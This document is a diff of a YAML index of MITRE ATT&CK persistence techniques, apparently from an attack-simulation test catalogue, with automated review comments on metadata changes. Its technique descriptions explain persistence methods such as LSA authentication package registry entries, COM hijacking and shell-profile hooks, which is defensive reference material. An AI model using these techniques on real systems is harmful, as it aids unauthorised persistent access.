- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
- - kill_chain_name: mitre-attack
- phase_name: privilege-escalation
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Command: Command Execution'
- - 'File: File Creation'
- - 'File: File Modification'
- - 'Kernel: Kernel Module Load'
- - 'Process: Process Creation'
- x_mitre_permissions_required:
- - root
- x_mitre_attack_spec_version: 2.1.0
+ url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.006
atomic_tests:
- name: Linux - Load Kernel Module via insmod
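Review bot: the `-` lines in this hunk for T1547.006 remove `description`, `x_mitre_detection`, `kill_chain_phases`, `x_mitre_data_sources` (five entries), `x_mitre_permissions_required: root`, `x_mitre_deprecated` and `revoked`, but the only `+` lines are the reordered `url:` entries, `object_marking_refs` and `x_mitre_attack_spec_version: 3.2.0`. Those blocks must be re-emitted earlier in the object under the new key order, as is done for T1137.003 and T1546.004 later in this diff, otherwise the technique loses its detection text and its data sources; please confirm the regenerated object still carries all of them.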
@@ -68742,7 +69165,7 @@ persistence:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
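Review bot: the `modified` timestamp for KernelCallbackTable moves backwards, from 2022-05-11 to 2022-03-22. The same regression appears for ROMMONkit (2021-04-29 to 2020-10-22), IIS Components (2022-04-25 to 2021-10-17), Authentication Package (2022-05-11 to 2022-04-20) and Component Object Model Hijacking (2023-05-09 to 2023-04-21). If the old values were a bundle-level date and the new ones are each object's own `modified`, that is a correction, but it should be stated in the commit message, and any consumer that compares `modified` to detect updated techniques will now see these objects as older rather than newer.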
@@ -68768,12 +69191,10 @@ persistence:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
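Review bot: KernelCallbackTable drops `x_mitre_attack_spec_version: 2.1.0` together with `spec_version` and gets no replacement in this hunk, whereas most other objects in the diff are re-emitted with `x_mitre_attack_spec_version: 3.2.0`. ROMMONkit and IIS Components show the same pattern further down. If anything that validates or indexes this YAML requires the field, these three objects will now be missing it; either re-emit the value or confirm it is optional.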
@@ -68851,9 +69272,8 @@ persistence:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests:
- name: Create Systemd Service and Timer
@@ -68991,7 +69411,7 @@ persistence:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T02:18:19.568Z'
name: ROMMONkit
description: |-
Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -69013,41 +69433,10 @@ persistence:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1137.003:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
- type: attack-pattern
- created: '2019-11-07T20:06:02.624Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.003
- url: https://attack.mitre.org/techniques/T1137/003
- - source_name: SensePost Outlook Forms
- url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
- description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
- February 4, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
- - source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
- description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
- provides blue teams with the ability to detect Ruler usage against Exchange.
- Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:02:00.782Z'
name: Outlook Forms
description: |-
Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
@@ -69056,22 +69445,49 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Command: Command Execution'
- 'Process: Process Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
+ created: '2019-11-07T20:06:02.624Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/003
+ external_id: T1137.003
+ - source_name: Microsoft Detect Outlook Forms
+ description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+ Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+ 4, 2019.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SensePost NotRuler
+ description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+ provides blue teams with the ability to detect Ruler usage against Exchange.
+ Retrieved February 4, 2019.
+ url: https://github.com/sensepost/notruler
+ - source_name: SensePost Outlook Forms
+ description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
+ February 4, 2019.
+ url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1574:
technique:
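Review bot: `x_mitre_permissions_required` (Administrator, User) for Outlook Forms is removed in this hunk and never re-added, while IIS Components, Authentication Package and T1546.004 keep theirs in this same diff. Confirm the upstream object genuinely dropped the field rather than the regenerator skipping it. The platform rename from `Office 365` to `Office Suite` and the `x_mitre_version` bump to 1.2 are consistent with the other objects, and the removed `id`, `created`, `external_references` and `x_mitre_platforms` blocks from the previous hunk all reappear here, so the rest is a key reorder.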
@@ -69137,7 +69553,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.005:
technique:
@@ -69211,11 +69626,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -69232,7 +69646,6 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -69242,7 +69655,7 @@ persistence:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -69251,19 +69664,17 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
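Review bot: removing `Azure AD`, `Office 365` and `Google Workspace` from `x_mitre_platforms` for T1078 in favour of `Office Suite` and `Identity Provider` changes which platform-specific index files this technique lands in; any index keyed on the old platform names will silently lose it, so the index regeneration for those three platforms should be checked alongside this change. The same rename is applied to T1556.006 and T1546 further down, so the treatment is at least consistent across objects.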
@@ -69311,11 +69722,12 @@ persistence:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1556.006:
technique:
- modified: '2024-04-16T00:20:21.488Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Multi-Factor Authentication
description: "Adversaries may disable or modify multi-factor authentication
(MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -69344,24 +69756,26 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Liran Ravich, CardinalOps
- Muhammad Moiz Arshad, @5T34L7H
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- Linux
- macOS
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'Application Log: Application Log Content'
@@ -69396,9 +69810,6 @@ persistence:
url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1505.004:
technique:
@@ -69458,7 +69869,7 @@ persistence:
description: Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor
on Targets in the Middle East. Retrieved July 6, 2018.
source_name: Unit 42 RGDoor Jan 2018
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T15:06:24.161Z'
name: IIS Components
description: |-
Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: Get{Extension/Filter}Version
, Http{Extension/Filter}Proc
, and (optionally) Terminate{Extension/Filter}
. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
@@ -69483,8 +69894,6 @@ persistence:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1505.004
atomic_tests:
- name: Install IIS Module using AppCmd.exe
@@ -69563,7 +69972,7 @@ persistence:
name: powershell
T1546:
technique:
- modified: '2024-03-01T15:49:15.588Z'
+ modified: '2024-10-15T15:57:00.731Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
@@ -69616,8 +70025,8 @@ persistence:
- Windows
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Module: Module Load'
- 'WMI: WMI Creation'
@@ -69665,7 +70074,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546
atomic_tests:
- name: Persistence with Custom AutodialDLL
@@ -69881,73 +70289,7 @@ persistence:
elevation_required: true
T1546.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Robert Wilson
- - Tony Lambert, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
- type: attack-pattern
- created: '2020-01-24T14:13:45.936Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1546.004
- url: https://attack.mitre.org/techniques/T1546/004
- - source_name: intezer-kaiji-malware
- url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
- turning to Golang. Retrieved December 17, 2020.'
- - source_name: bencane blog bashrc
- url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- description: Benjamin Cane. (2013, September 16). Understanding a little more
- about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
- - source_name: anomali-rocke-tactics
- url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
- Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
- December 17, 2020.
- - source_name: Linux manual bash invocation
- url: https://wiki.archlinux.org/index.php/Bash#Invocation
- description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
- - source_name: Tsunami
- url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
- Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
- - source_name: anomali-linux-rabbit
- url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
- Malware Out of a Hat. Retrieved December 17, 2020.
- - source_name: Magento
- url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
- Vector. Retrieved December 17, 2020.
- - source_name: ScriptingOSX zsh
- url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
- Files. Retrieved February 25, 2021.'
- - source_name: PersistentJXA_leopitt
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
- for macOS. Retrieved January 11, 2021.
- - source_name: code_persistence_zsh
- url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
- Retrieved January 11, 2021.
- - source_name: macOS MS office sandbox escape
- url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
- Retrieved August 20, 2021.
- - source_name: ESF_filemonitor
- url: https://objective-see.com/blog/blog_0x48.html
- description: Patrick Wardle. (2019, September 17). Writing a File Monitor
- with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-25T15:02:24.143Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -69995,6 +70337,10 @@ persistence:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Robert Wilson
+ - Tony Lambert, Red Canary
+ x_mitre_deprecated: false
x_mitre_detection: "While users may customize their shell profile files, there
are only certain types of commands that typically appear in these files. Monitor
for abnormal commands such as execution of unknown programs, opening network
@@ -70005,9 +70351,13 @@ persistence:
events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
most Linux and macOS systems, a list of file paths for valid shell options
available on a system are located in the /etc/shells
file.\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -70016,8 +70366,67 @@ persistence:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+ created: '2020-01-24T14:13:45.936Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/004
+ external_id: T1546.004
+ - source_name: anomali-linux-rabbit
+ description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+ Malware Out of a Hat. Retrieved December 17, 2020.
+ url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+ - source_name: anomali-rocke-tactics
+ description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+ Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+ December 17, 2020.
+ url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+ - source_name: Linux manual bash invocation
+ description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+ url: https://wiki.archlinux.org/index.php/Bash#Invocation
+ - source_name: ScriptingOSX zsh
+ description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+ Files. Retrieved February 25, 2021.'
+ url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+ - source_name: bencane blog bashrc
+ description: Benjamin Cane. (2013, September 16). Understanding a little more
+ about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+ url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+ - source_name: macOS MS office sandbox escape
+ description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+ Retrieved August 20, 2021.
+ url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+ - source_name: Magento
+ description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+ Vector. Retrieved December 17, 2020.
+ url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+ - source_name: Tsunami
+ description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+ Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+ url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ - source_name: PersistentJXA_leopitt
+ description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+ for macOS. Retrieved January 11, 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: code_persistence_zsh
+ description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+ Retrieved January 11, 2021.
+ url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+ - source_name: ESF_filemonitor
+ description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+ with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+ url: https://objective-see.com/blog/blog_0x48.html
+ - source_name: intezer-kaiji-malware
+ description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+ turning to Golang. Retrieved December 17, 2020.'
+ url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.004
atomic_tests:
- name: Add command to .bash_profile
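Review bot: the `bencane blog bashrc` reference is the one entry in this re-emitted list whose content changes rather than just its position: the URL becomes a web.archive.org snapshot and the retrieved date becomes September 25, 2024. That is reasonable for a dead link but deserves a line in the commit message, since every other reference in the list is a byte-for-byte reorder of the lines removed above.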
@@ -70203,7 +70612,7 @@ persistence:
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of "Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:29:36.291Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Authentication Package
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -70226,7 +70635,6 @@ persistence:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.002
atomic_tests:
- name: Authentication Package
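Review bot: T1547.002 keeps `x_mitre_attack_spec_version: 2.1.0` (unchanged context line) while nearly every other object in this diff is bumped to 3.2.0, and its `modified` moves backwards to 2022-04-20 in the preceding hunk. That suggests this object was not refreshed from the same source snapshot as the rest; worth checking whether it is stale or intentionally left as is.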
@@ -70249,7 +70657,7 @@ persistence:
elevation_required: true
T1546.015:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:34:29.402Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
@@ -70327,7 +70735,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.015
atomic_tests:
- name: COM Hijacking - InprocServer32
@@ -70470,36 +70877,7 @@ persistence:
name: powershell
T1137.004:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
- type: attack-pattern
- created: '2019-11-07T20:09:56.536Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.004
- url: https://attack.mitre.org/techniques/T1137/004
- - source_name: SensePost Outlook Home Page
- url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
- description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
- Ruler Vector. Retrieved February 4, 2019.
- - source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
- description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
- Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
- 4, 2019.
- - source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
- description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
- provides blue teams with the ability to detect Ruler usage against Exchange.
- Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:02:13.742Z'
name: 'Office Application Startup: Outlook Home Page'
description: |
Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
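Review bot: the 29-line removal of T1137.004's `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and `external_references` is a key reorder rather than a deletion: the same values reappear further down the object in the next hunk. Emitting keys in a stable order from the generator would reduce this to the real changes (the `modified` date, the platform rename and the added `x_mitre_deprecated` and `revoked` flags) and make the diff reviewable.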
@@ -70508,22 +70886,49 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
